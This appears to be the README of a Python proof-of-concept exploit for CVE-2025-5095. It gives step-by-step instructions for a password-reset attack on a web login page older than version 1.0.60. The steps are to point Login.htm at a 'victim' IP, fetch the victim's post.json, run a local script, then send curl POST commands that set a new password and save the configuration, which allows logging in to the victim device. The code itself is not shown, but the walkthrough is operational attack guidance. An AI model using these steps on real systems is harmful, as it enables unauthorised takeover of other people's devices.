
Python POC for CVE-2025-5095
How To Use:
Open Login.htm and edit the places where IP:PORT is to the victim address
Edit the var LoginVersion = "Check On The Victim Site"; part to the victim page version, by this, you can visit the victim page and view as source WARNING: THIS CVE ONLY WORKS ON VERSIONS OLDER THAN 1.0.60
Download the post.json file from the victim site (http://victimip:port/post.json) Move it to the script folder and you gonna have 3 files
Now run the python file and access 127.0.0.1:8080/login.htm (If the port 8080 is already in use, you can change by opening the script on a text editor and change the last part)
Ignore the alert when opening the login page
Open A Terminal And use this curl commands, if it prints "success" it worked.
curl -v -X POST http://localhost:8080/post.json -d "UserPassword0=newtestpass"
curl -v -X POST http://localhost:8080/post.json -d "UsersSaveConfig=true"
To check if the page changed, send this command:
curl http://localhost:8080/check_password
Now, visit the victim site (not the localhost one) and insert the new password, on this example, the password is "newtestpass"